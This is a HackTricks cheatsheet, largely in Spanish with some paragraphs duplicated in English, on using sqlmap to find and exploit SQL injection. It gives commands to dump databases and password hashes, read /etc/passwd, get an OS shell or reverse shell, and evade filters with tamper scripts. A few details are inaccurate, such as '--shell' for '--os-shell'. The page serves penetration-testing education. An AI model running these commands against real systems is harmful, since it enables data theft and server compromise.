.. | ||
README.md | ||
second-order-injection-sqlmap.md |
SQLMap - Cheatsheet
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el swag oficial de PEASS y HackTricks
- Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.
DragonJAR Security Conference es un evento internacional de ciberseguridad con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
{% embed url="https://www.dragonjarcon.org/" %}
Argumentos básicos para SQLmap
Genéricos
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
Obtener Información
Interna
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges
Datos de la base de datos
The database contains sensitive information that can be valuable to an attacker. This information can include usernames, passwords, personal details, financial data, and more. It is important to protect this data from unauthorized access and potential leaks. In the context of a penetration test, accessing and extracting data from the database can provide valuable insights into the target system's security vulnerabilities.
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
Lugar de inyección
Desde la captura de Burp/ZAP
Captura la solicitud y crea un archivo req.txt
sqlmap -r req.txt --current-user
Inyección en solicitudes GET
La inyección en solicitudes GET es una técnica común utilizada en pruebas de penetración para explotar vulnerabilidades de seguridad en aplicaciones web. Esta técnica implica manipular los parámetros de una solicitud GET para ejecutar comandos SQL maliciosos en la base de datos subyacente.
¿Cómo funciona?
Cuando se envía una solicitud GET a un servidor web, los parámetros se incluyen en la URL. Estos parámetros se pueden manipular para insertar código SQL malicioso. El servidor web procesa la solicitud y ejecuta el código SQL sin validar o filtrar adecuadamente los datos ingresados. Esto permite al atacante extraer información confidencial, modificar datos o incluso tomar el control total de la base de datos.
Uso de SQLMap
SQLMap es una herramienta popular utilizada para automatizar la detección y explotación de vulnerabilidades de inyección SQL. Puede ayudar a identificar fácilmente las vulnerabilidades de inyección en solicitudes GET y realizar ataques de inyección SQL de manera eficiente.
Para utilizar SQLMap en solicitudes GET, simplemente proporcione la URL de destino y especifique los parámetros que desea probar. SQLMap analizará automáticamente la URL y los parámetros, y realizará pruebas exhaustivas para detectar y explotar posibles vulnerabilidades de inyección SQL.
Precauciones
Es importante tener en cuenta que la inyección en solicitudes GET puede tener consecuencias graves y potencialmente dañinas. Antes de realizar pruebas de penetración en aplicaciones web, asegúrese de tener el permiso adecuado del propietario del sistema y siga las mejores prácticas de ética y seguridad.
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
Inyección en solicitudes POST
When performing a penetration test, it is common to encounter web applications that use POST requests to send data to the server. In these cases, it is important to understand how to perform SQL injection attacks on POST requests.
Durante la realización de una prueba de penetración, es común encontrarse con aplicaciones web que utilizan solicitudes POST para enviar datos al servidor. En estos casos, es importante entender cómo realizar ataques de inyección SQL en solicitudes POST.
SQLMap is a powerful tool that can automate the process of detecting and exploiting SQL injection vulnerabilities. It supports various techniques for injecting SQL queries into POST requests.
SQLMap es una herramienta poderosa que puede automatizar el proceso de detección y explotación de vulnerabilidades de inyección SQL. Soporta varias técnicas para inyectar consultas SQL en solicitudes POST.
To use SQLMap with POST requests, you need to provide the target URL and the parameters that are sent in the POST request. SQLMap will then analyze the parameters and attempt to inject SQL queries into them.
Para utilizar SQLMap con solicitudes POST, debes proporcionar la URL objetivo y los parámetros que se envían en la solicitud POST. SQLMap analizará los parámetros e intentará inyectar consultas SQL en ellos.
Here is an example command to use SQLMap with a POST request:
Aquí tienes un ejemplo de comando para utilizar SQLMap con una solicitud POST:
sqlmap -u "http://example.com/login" --data "username=admin&password=pass" --method POST
In this example, we specify the target URL as http://example.com/login
and the parameters as username=admin&password=pass
. The --method POST
flag tells SQLMap to use a POST request.
En este ejemplo, especificamos la URL objetivo como http://example.com/login
y los parámetros como username=admin&password=pass
. La opción --method POST
indica a SQLMap que utilice una solicitud POST.
SQLMap will then analyze the parameters and attempt to inject SQL queries into them. It will automatically detect any SQL injection vulnerabilities and exploit them if found.
SQLMap analizará los parámetros e intentará inyectar consultas SQL en ellos. Detectará automáticamente cualquier vulnerabilidad de inyección SQL y la explotará si se encuentra.
Using SQLMap with POST requests can be a powerful technique for identifying and exploiting SQL injection vulnerabilities in web applications. However, it is important to use this technique responsibly and with proper authorization.
Utilizar SQLMap con solicitudes POST puede ser una técnica poderosa para identificar y explotar vulnerabilidades de inyección SQL en aplicaciones web. Sin embargo, es importante utilizar esta técnica de manera responsable y con la debida autorización.
sqlmap -u "http://example.com" --data "username=*&password=*"
Inyecciones en Encabezados y otros Métodos HTTP
When performing a web application penetration test, it is important to thoroughly test for vulnerabilities in all areas of the application, including the headers and other HTTP methods. Injections in headers and other HTTP methods can be just as dangerous as traditional SQL injections or other common vulnerabilities.
Cuando se realiza una prueba de penetración en una aplicación web, es importante probar exhaustivamente las vulnerabilidades en todas las áreas de la aplicación, incluyendo los encabezados y otros métodos HTTP. Las inyecciones en los encabezados y otros métodos HTTP pueden ser tan peligrosas como las inyecciones SQL tradicionales u otras vulnerabilidades comunes.
Header Injection
Header injection occurs when an attacker is able to manipulate the headers of an HTTP request. This can be done by injecting malicious input into user-controlled headers, such as the User-Agent
or Referer
headers. The injected input can be used to perform various attacks, such as cross-site scripting (XSS) or cross-site request forgery (CSRF).
La inyección en los encabezados ocurre cuando un atacante es capaz de manipular los encabezados de una solicitud HTTP. Esto se puede hacer mediante la inyección de entrada maliciosa en los encabezados controlados por el usuario, como los encabezados User-Agent
o Referer
. La entrada inyectada se puede utilizar para realizar varios ataques, como cross-site scripting (XSS) o cross-site request forgery (CSRF).
To test for header injection vulnerabilities, you can use tools like Burp Suite or manually craft HTTP requests with modified headers. By injecting payloads and observing the application's response, you can determine if the application is vulnerable to header injection attacks.
Para probar las vulnerabilidades de inyección en los encabezados, puedes utilizar herramientas como Burp Suite o crear manualmente solicitudes HTTP con encabezados modificados. Al inyectar cargas útiles y observar la respuesta de la aplicación, puedes determinar si la aplicación es vulnerable a los ataques de inyección en los encabezados.
Other HTTP Methods
In addition to the commonly used HTTP methods like GET and POST, there are other less known methods that can also be vulnerable to injection attacks. These methods include PUT, DELETE, OPTIONS, and TRACE.
Además de los métodos HTTP comúnmente utilizados como GET y POST, hay otros métodos menos conocidos que también pueden ser vulnerables a ataques de inyección. Estos métodos incluyen PUT, DELETE, OPTIONS y TRACE.
When testing for vulnerabilities in these methods, it is important to check if the application properly sanitizes and validates user input. By injecting payloads into the request body or parameters, you can determine if the application is vulnerable to injection attacks.
Al probar las vulnerabilidades en estos métodos, es importante verificar si la aplicación sanitiza y valida correctamente la entrada del usuario. Al inyectar cargas útiles en el cuerpo de la solicitud o en los parámetros, puedes determinar si la aplicación es vulnerable a ataques de inyección.
Conclusion
Injections in headers and other HTTP methods can lead to serious security vulnerabilities in web applications. It is crucial to thoroughly test for these vulnerabilities during a penetration test to ensure the application's security.
Las inyecciones en los encabezados y otros métodos HTTP pueden llevar a graves vulnerabilidades de seguridad en las aplicaciones web. Es crucial probar exhaustivamente estas vulnerabilidades durante una prueba de penetración para garantizar la seguridad de la aplicación.
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
Indicar cadena cuando la inyección es exitosa
When performing SQL injection attacks, it is important to determine whether the injection was successful or not. One way to do this is by indicating a specific string that will be displayed when the injection is successful.
To achieve this, you can use the --string
option in SQLMap. This option allows you to specify a string that should be present in the response when the injection is successful.
For example, let's say you are injecting into a login form and you want to check if the injection was successful by looking for the string "Welcome, admin!" in the response. You can use the following command:
sqlmap -u "http://example.com/login.php" --data "username=admin&password=123" --string "Welcome, admin!"
SQLMap will send the injection payload to the specified URL and check if the response contains the specified string. If the string is found, it means that the injection was successful.
By indicating a specific string, you can easily identify when the injection is working and proceed with further exploitation or testing.
--string="string_showed_when_TRUE"
Eval
Sqlmap permite el uso de -e
o --eval
para procesar cada carga útil antes de enviarla con un comando de una sola línea en Python. Esto facilita y agiliza el procesamiento personalizado de la carga útil antes de enviarla. En el siguiente ejemplo, la sesión de cookies de Flask es firmada por Flask con el secreto conocido antes de enviarla:
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
Shell
La opción --shell
de SQLMap permite obtener una shell interactiva en el sistema objetivo después de explotar una inyección de SQL exitosa. Esto proporciona un control total sobre el sistema y permite ejecutar comandos arbitrarios.
Para utilizar esta opción, primero debes asegurarte de que SQLMap ha identificado una vulnerabilidad de inyección de SQL en el objetivo. Una vez que se haya confirmado la vulnerabilidad, puedes ejecutar el siguiente comando para obtener una shell:
sqlmap -u <URL> --os-shell
Reemplaza <URL>
con la URL del objetivo que contiene la vulnerabilidad de inyección de SQL.
Después de ejecutar este comando, SQLMap intentará obtener una shell en el sistema objetivo. Si tiene éxito, se abrirá una shell interactiva donde podrás ejecutar comandos como si estuvieras directamente en el sistema.
Es importante tener en cuenta que el uso de la opción --shell
puede ser ilegal y está sujeto a las leyes y regulaciones locales. Solo debes utilizar esta opción en sistemas en los que tengas permiso explícito para hacerlo, como parte de una prueba de penetración autorizada.
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
Leer archivo
La opción --file-read
de SQLMap se utiliza para leer archivos del sistema de archivos del servidor de la base de datos. Esta opción es útil para extraer información confidencial almacenada en archivos, como credenciales de bases de datos o archivos de configuración.
Sintaxis
--file-read=<ruta_del_archivo>
Ejemplo
sqlmap -u "http://example.com/vulnerable.php?id=1" --file-read=/etc/passwd
En el ejemplo anterior, SQLMap intentará leer el archivo /etc/passwd
del sistema de archivos del servidor de la base de datos. Si tiene éxito, mostrará el contenido del archivo en la salida.
Es importante tener en cuenta que esta opción solo funcionará si el servidor de la base de datos tiene permisos para leer el archivo especificado. Además, el usuario que ejecuta SQLMap también debe tener los permisos adecuados para leer archivos en el sistema de archivos del servidor.
--file-read=/etc/passwd
Rastrear un sitio web con SQLmap y autoexplotar
SQLmap es una herramienta de prueba de penetración ampliamente utilizada para detectar y explotar vulnerabilidades de inyección SQL en aplicaciones web. Una de las características más poderosas de SQLmap es su capacidad para rastrear automáticamente un sitio web en busca de posibles puntos de inyección SQL y luego explotarlos de manera automática.
Para rastrear un sitio web con SQLmap, sigue estos pasos:
- Descarga e instala SQLmap en tu máquina.
- Abre una terminal y navega hasta el directorio donde se encuentra SQLmap.
- Ejecuta el comando
sqlmap -u <URL>
para especificar la URL del sitio web que deseas rastrear. - SQLmap comenzará a rastrear el sitio web en busca de posibles puntos de inyección SQL. Esto puede llevar algún tiempo dependiendo del tamaño y la complejidad del sitio web.
- Una vez que SQLmap haya encontrado un punto de inyección SQL, te mostrará la información relevante sobre la vulnerabilidad.
- Puedes utilizar la opción
--dbs
para enumerar las bases de datos disponibles en el servidor y--tables -D <nombre_de_la_base_de_datos>
para enumerar las tablas de una base de datos específica. - Para explotar la vulnerabilidad de inyección SQL, utiliza la opción
--dump -D <nombre_de_la_base_de_datos> -T <nombre_de_la_tabla>
para extraer datos de una tabla específica. - SQLmap también ofrece muchas otras opciones y funcionalidades avanzadas que puedes explorar según tus necesidades.
Recuerda que el uso de SQLmap en un sitio web sin permiso explícito del propietario es ilegal y puede tener consecuencias legales graves. Siempre realiza pruebas de penetración en entornos controlados y con el consentimiento del propietario del sitio web.
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
Inyección de Segundo Orden
Second Order Injection is a type of SQL injection attack that occurs when user input is not directly vulnerable to SQL injection, but is stored in a database and later used in a vulnerable SQL query. This allows an attacker to manipulate the stored data in a way that can lead to unauthorized access or data leakage.
La Inyección de Segundo Orden es un tipo de ataque de inyección SQL que ocurre cuando la entrada del usuario no es directamente vulnerable a la inyección SQL, pero se almacena en una base de datos y luego se utiliza en una consulta SQL vulnerable. Esto permite a un atacante manipular los datos almacenados de una manera que puede llevar a un acceso no autorizado o una filtración de datos.
To exploit a second order injection vulnerability, an attacker typically needs to perform the following steps:
Para explotar una vulnerabilidad de inyección de segundo orden, un atacante típicamente necesita realizar los siguientes pasos:
-
Identify a point in the application where user input is stored in a database.
-
Determine how the stored data is later used in a SQL query.
-
Craft a malicious payload that, when executed in the vulnerable SQL query, can manipulate the stored data in a way that achieves the attacker's goals.
-
Identificar un punto en la aplicación donde la entrada del usuario se almacena en una base de datos.
-
Determinar cómo se utiliza posteriormente los datos almacenados en una consulta SQL.
-
Crear una carga útil maliciosa que, cuando se ejecuta en la consulta SQL vulnerable, puede manipular los datos almacenados de una manera que logre los objetivos del atacante.
To detect and exploit second order injection vulnerabilities, tools like SQLMap can be used. SQLMap is a popular open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities.
Para detectar y explotar vulnerabilidades de inyección de segundo orden, se pueden utilizar herramientas como SQLMap. SQLMap es una popular herramienta de prueba de penetración de código abierto que automatiza el proceso de detección y explotación de vulnerabilidades de inyección SQL.
It is important for developers and security professionals to be aware of second order injection vulnerabilities and take appropriate measures to prevent them. This includes validating and sanitizing user input, using parameterized queries or prepared statements, and regularly updating and patching software to address any known vulnerabilities.
Es importante que los desarrolladores y profesionales de seguridad estén conscientes de las vulnerabilidades de inyección de segundo orden y tomen medidas apropiadas para prevenirlas. Esto incluye validar y sanitizar la entrada del usuario, utilizar consultas parametrizadas o declaraciones preparadas, y actualizar y parchar regularmente el software para abordar cualquier vulnerabilidad conocida.
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
Lee esta publicaciónsobre cómo realizar inyecciones de segundo orden simples y complejas con sqlmap.
Laboratorios para practicar
- Aprende sobre sqlmap usándolo en la sala THM:
{% embed url="https://tryhackme.com/room/sqlmap" %}
Personalizando la inyección
Establecer un sufijo
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
Prefijo
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
Ayuda para encontrar inyección booleana
Si sospechas que un sitio web es vulnerable a una inyección SQL booleana, puedes utilizar la herramienta sqlmap
para ayudarte en el proceso de pentesting. sqlmap
es una herramienta de código abierto que automatiza la detección y explotación de vulnerabilidades de inyección SQL.
Para encontrar una inyección booleana, sigue estos pasos:
-
Ejecuta
sqlmap
en tu terminal y especifica la URL del sitio web objetivo.sqlmap -u <URL>
-
Si el sitio web es vulnerable a la inyección SQL booleana,
sqlmap
lo detectará automáticamente y te mostrará un mensaje indicando que se encontró una vulnerabilidad. -
Para confirmar la vulnerabilidad,
sqlmap
puede realizar una serie de pruebas utilizando técnicas de inyección booleana. Puedes utilizar la opción--technique=B
para especificar que solo se utilicen técnicas booleanas.sqlmap -u <URL> --technique=B
-
sqlmap
intentará extraer información de la base de datos utilizando inyección booleana. Puedes utilizar la opción--dump
para extraer los datos de las tablas de la base de datos.sqlmap -u <URL> --technique=B --dump
Recuerda que siempre debes obtener permiso del propietario del sitio web antes de realizar cualquier prueba de penetración.
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
Manipulación
Recuerda que puedes crear tu propia manipulación en python y es muy sencillo. Puedes encontrar un ejemplo de manipulación en la página de Inyección de Segundo Orden aquí.
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper | Descripción |
---|---|
apostrophemask.py | Reemplaza el carácter de apóstrofe con su contraparte de ancho completo en UTF-8 |
apostrophenullencode.py | Reemplaza el carácter de apóstrofe con su contraparte de doble unicode ilegal |
appendnullbyte.py | Agrega un carácter de byte NULL codificado al final de la carga útil |
base64encode.py | Codifica en Base64 todos los caracteres de una carga útil dada |
between.py | Reemplaza el operador mayor que ('>') con 'NOT BETWEEN 0 AND #' |
bluecoat.py | Reemplaza el carácter de espacio después de la declaración SQL con un carácter en blanco aleatorio válido. Luego reemplaza el carácter = con el operador LIKE |
chardoubleencode.py | Codifica en doble URL todos los caracteres de una carga útil dada (sin procesar los ya codificados) |
commalesslimit.py | Reemplaza instancias como 'LIMIT M, N' con 'LIMIT N OFFSET M' |
commalessmid.py | Reemplaza instancias como 'MID(A, B, C)' con 'MID(A FROM B FOR C)' |
concat2concatws.py | Reemplaza instancias como 'CONCAT(A, B)' con 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
charencode.py | Codifica en URL todos los caracteres de una carga útil dada (sin procesar los ya codificados) |
charunicodeencode.py | Codifica en Unicode-URL los caracteres no codificados de una carga útil dada (sin procesar los ya codificados). "%u0022" |
charunicodeescape.py | Codifica en Unicode-URL los caracteres no codificados de una carga útil dada (sin procesar los ya codificados). "\u0022" |
equaltolike.py | Reemplaza todas las ocurrencias del operador igual ('=') con el operador 'LIKE' |
escapequotes.py | Escapa las comillas (' y ") con una barra diagonal |
greatest.py | Reemplaza el operador mayor que ('>') con su contraparte 'GREATEST' |
halfversionedmorekeywords.py | Agrega un comentario versionado de MySQL antes de cada palabra clave |
ifnull2ifisnull.py | Reemplaza instancias como 'IFNULL(A, B)' con 'IF(ISNULL(A), B, A)' |
modsecurityversioned.py | Envuelve la consulta completa con un comentario versionado |
modsecurityzeroversioned.py | Envuelve la consulta completa con un comentario de versión cero |
multiplespaces.py | Agrega varios espacios alrededor de las palabras clave de SQL |
nonrecursivereplacement.py | Reemplaza las palabras clave de SQL predefinidas con representaciones adecuadas para su reemplazo (por ejemplo, .replace("SELECT", "")) filters |
percentage.py | Agrega un signo de porcentaje ('%') delante de cada carácter |
overlongutf8.py | Convierte todos los caracteres de una carga útil dada (sin procesar los ya codificados) |
randomcase.py | Reemplaza cada carácter de palabra clave con un valor de caso aleatorio |
randomcomments.py | Agrega comentarios aleatorios a las palabras clave de SQL |
securesphere.py | Agrega una cadena especial diseñada |
sp_password.py | Agrega 'sp_password' al final de la carga útil para la obfuscación automática de los registros del DBMS |
space2comment.py | Reemplaza el carácter de espacio (' ') con comentarios |
space2dash.py | Reemplaza el carácter de espacio (' ') con un comentario de guión ('--') seguido de una cadena aleatoria y un salto de línea ('\n') |
space2hash.py | Reemplaza el carácter de espacio (' ') con un carácter de almohadilla ('#') seguido de una cadena aleatoria y un salto de línea ('\n') |
space2morehash.py | Reemplaza el carácter de espacio (' ') con un carácter de almohadilla ('#') seguido de una cadena aleatoria y un salto de línea ('\n') |
space2mssqlblank.py | Reemplaza el carácter de espacio (' ') con un carácter en blanco aleatorio de un conjunto válido de caracteres alternativos |
space2mssqlhash.py | Reemplaza el carácter de espacio (' ') con un carácter de almohadilla ('#') seguido de un salto de línea ('\n') |
space2mysqlblank.py | Reemplaza el carácter de espacio (' ') con un carácter en blanco aleatorio de un conjunto válido de caracteres alternativos |
space2mysqldash.py | Reemplaza el carácter de espacio (' ') con un comentario de guión ('--') seguido de un salto de línea ('\n') |
space2plus.py | Reemplaza el carácter de espacio (' ') con un signo más ('+') |
space2randomblank.py | Reemplaza el carácter de espacio (' ') con un carácter en blanco aleatorio de un conjunto válido de caracteres alternativos |
symboliclogical.py | Reemplaza los operadores lógicos AND y OR con sus contrapartes simbólicas (&& y |
unionalltounion.py | Reemplaza UNION ALL SELECT con UNION SELECT |
unmagicquotes.py | Reemplaza el carácter de comilla (') con una combinación de varios bytes %bf%27 junto con un comentario genérico al final (para que funcione) |
uppercase.py | Reemplaza cada carácter de palabra clave con el valor en mayúscula 'INSERT' |
varnish.py | Agrega una cabecera HTTP 'X-originating-IP' |
versionedkeywords.py | Encierra cada palabra clave no funcional con un comentario versionado de MySQL |
versionedmorekeywords.py | Encierra cada palabra clave con un comentario versionado de MySQL |
xforwardedfor.py | Agrega una cabecera HTTP falsa 'X-Forwarded-For' |
DragonJAR Security Conference es un evento internacional de ciberseguridad con más de una década de experiencia que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español y atrae a hackers e investigadores de todo el mundo.
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el merchandising oficial de PEASS y HackTricks
- Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.